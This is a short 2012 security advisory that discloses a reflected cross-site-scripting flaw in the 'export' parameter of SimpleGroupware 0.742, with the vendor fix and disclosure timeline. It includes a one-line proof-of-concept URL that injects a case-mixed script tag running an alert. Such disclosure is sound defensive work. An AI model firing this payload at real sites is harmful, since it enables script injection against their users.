Advisory: SimpleGroupware 0.742 Cross-Site-Scripting vulnerability Advisory ID: INFOSERVE-ADV2012-01 Author: Stefan Schurtz Contact: security@xxxxxxxxxxxx Affected Software: Successfully tested on SimpleGroupware 0.742 Vendor URL: http://www.simple-groupware.de/ Vendor Status: fixed (see Changelog) ========================== Vulnerability Description ========================== SimpleGroupware 0.742 'export' parameter XSS vulnerability ================== PoC-Exploit ================== http://[target]/SimpleGroupware_0.742/bin/index.php?export=<ScRiPt >alert('xss')</ScRiPt> ========= Solution ========= Upgrade to the latest Version 0.743 ==================== Disclosure Timeline ==================== 01-Feb-2012 - informed vendor 02-Feb-2012 - fixed by vendor ======== Credits ======== Vulnerabilitiy found and advisory written by the INFOSERVE security team. =========== References =========== http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2012-01.txt
